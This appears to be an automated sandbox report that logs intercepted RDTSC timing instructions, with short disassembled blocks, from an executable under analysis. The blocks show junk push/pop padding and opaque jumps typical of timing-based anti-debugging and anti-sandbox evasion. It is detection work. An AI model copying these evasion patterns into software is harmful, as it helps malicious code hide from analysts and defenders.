Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B87650 second address: B87656 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B87656 second address: B8765A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B8765A second address: B87681 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FC22CC1B8BFh 0x0000000e jmp 00007FC22CC1B8B7h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B8BD09 second address: B8BD0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B8BD0D second address: B8BD13 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B8BFF2 second address: B8C00C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007FC22D01ECC6h 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 pushad 0x00000012 jg 00007FC22D01ECC6h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B8C00C second address: B8C036 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jnl 00007FC22CC1B8A6h 0x00000011 jmp 00007FC22CC1B8B9h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B8C036 second address: B8C03F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B8C03F second address: B8C045 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B8C045 second address: B8C052 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007FC22D01ECCCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B8C1B7 second address: B8C1BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B8C1BC second address: B8C1C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B8C1C2 second address: B8C1C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B8C65F second address: B8C663 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B8C937 second address: B8C955 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FC22CC1B8B4h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B8C955 second address: B8C95B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B8C95B second address: B8C960 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B92BF7 second address: B92BFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B92BFD second address: B92C03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B97075 second address: B9709A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22D01ECCFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnc 00007FC22D01ECD2h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B9709A second address: B970A1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B971ED second address: B971F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B97375 second address: B97379 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B97379 second address: B9739E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22D01ECD7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007FC22D01ECCAh 0x0000000f push edx 0x00000010 pop edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B9739E second address: B973AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jo 00007FC22CC1B8A6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B977E9 second address: B97854 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC22D01ECD1h 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FC22D01ECD8h 0x0000000f popad 0x00000010 jnl 00007FC22D01ECEBh 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jne 00007FC22D01ECC6h 0x00000021 jl 00007FC22D01ECC6h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B97854 second address: B9785F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B97B02 second address: B97B22 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22D01ECD7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B97B22 second address: B97B3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push esi 0x00000006 jmp 00007FC22CC1B8B2h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B97B3C second address: B97B55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FC22D01ECD2h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B97CB9 second address: B97CD5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8ADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a jns 00007FC22CC1B8A6h 0x00000010 pop edi 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B97E38 second address: B97E3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B98105 second address: B9810B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B1E817 second address: B1E83F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FC22D01ECC6h 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007FC22D01ECD8h 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B9B729 second address: B9B72F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B9B72F second address: B9B736 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B9B736 second address: B9B76F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ebx 0x0000000b jmp 00007FC22CC1B8B6h 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B9B76F second address: B9B77B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B60C00 second address: B60C05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B60C05 second address: B60C34 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22D01ECD6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC22D01ECD1h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B60C34 second address: B60C46 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC22CC1B8A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007FC22CC1B8A6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B61171 second address: B6117B instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC22D01ECC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B61220 second address: B61224 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B612F1 second address: B612FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B612FE second address: B61308 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC22CC1B8A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B61308 second address: B6130E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B6130E second address: B61312 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B613A6 second address: B613B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push ecx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B613B1 second address: B613CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC22CC1B8ABh 0x00000009 popad 0x0000000a pop ecx 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 jo 00007FC22CC1B8A6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B613CF second address: B613FC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov eax, dword ptr [eax] 0x00000009 jmp 00007FC22D01ECCEh 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FC22D01ECCFh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B61B44 second address: B61B53 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B61DFE second address: B61E02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B61E02 second address: B61E0C instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC22CC1B8A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B61E0C second address: B61E12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B61E12 second address: B61E5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007FC22CC1B8A8h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 00000017h 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 pushad 0x00000026 mov ebx, 6B61FBEAh 0x0000002b mov ecx, 38E79CF7h 0x00000030 popad 0x00000031 lea eax, dword ptr [ebp+1248B8A3h] 0x00000037 mov dword ptr [ebp+122D241Eh], ecx 0x0000003d nop 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B61E5A second address: B61E5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B61E5E second address: B61E85 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push eax 0x0000000b pushad 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B61E85 second address: B403F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 or edx, 474D8100h 0x0000000d call dword ptr [ebp+122D2AFEh] 0x00000013 push eax 0x00000014 push edx 0x00000015 jo 00007FC22D01ECCEh 0x0000001b pushad 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B403F3 second address: B403F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B403F7 second address: B40404 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007FC22D01ECC6h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B40404 second address: B40411 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 je 00007FC22CC1B8A6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B9BD1F second address: B9BD23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B9BD23 second address: B9BD3B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8AEh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B9BD3B second address: B9BD3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B9C1B3 second address: B9C1C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FC22CC1B8A6h 0x0000000a jnl 00007FC22CC1B8A6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B9C1C3 second address: B9C1C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B9C497 second address: B9C4AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8B0h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B9C4AD second address: B9C4D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 js 00007FC22D01ECC6h 0x0000000b jnl 00007FC22D01ECC6h 0x00000011 popad 0x00000012 pushad 0x00000013 jmp 00007FC22D01ECD0h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BA19BB second address: BA19C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FC22CC1B8A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BA1E2C second address: BA1E47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC22D01ECCBh 0x00000009 jmp 00007FC22D01ECCCh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BA1E47 second address: BA1E4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BA2238 second address: BA2259 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC22D01ECD7h 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BA23DA second address: BA23E0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BA23E0 second address: BA23F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FC22D01ECCDh 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BA259F second address: BA25C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a jne 00007FC22CC1B8A6h 0x00000010 jmp 00007FC22CC1B8B5h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BA25C4 second address: BA25D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jne 00007FC22D01ECC6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BA25D9 second address: BA25EC instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC22CC1B8A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f popad 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BA277F second address: BA2785 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BA2785 second address: BA278B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BA2A77 second address: BA2A85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC22D01ECCAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BA2A85 second address: BA2A8B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BA2A8B second address: BA2A9C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jng 00007FC22D01ECC6h 0x00000009 pushad 0x0000000a popad 0x0000000b pop edi 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BA2A9C second address: BA2AA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BA2EF1 second address: BA2EF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BA2EF5 second address: BA2F1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007FC22CC1B8BAh 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BA2F1B second address: BA2F1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BA2F1F second address: BA2F23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BA810F second address: BA811D instructions: 0x00000000 rdtsc 0x00000002 js 00007FC22D01ECC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BA8388 second address: BA83C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8B6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnp 00007FC22CC1B8C3h 0x0000000f jmp 00007FC22CC1B8B7h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: B1B262 second address: B1B28D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 jmp 00007FC22D01ECD9h 0x0000000c pushad 0x0000000d jnc 00007FC22D01ECC6h 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	RDTSC instruction interceptor: First address: BB02A1 second address: BB02B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007FC22CC1B8A6h 0x0000000e jbe 00007FC22CC1B8A6h 0x00000014 rdtsc
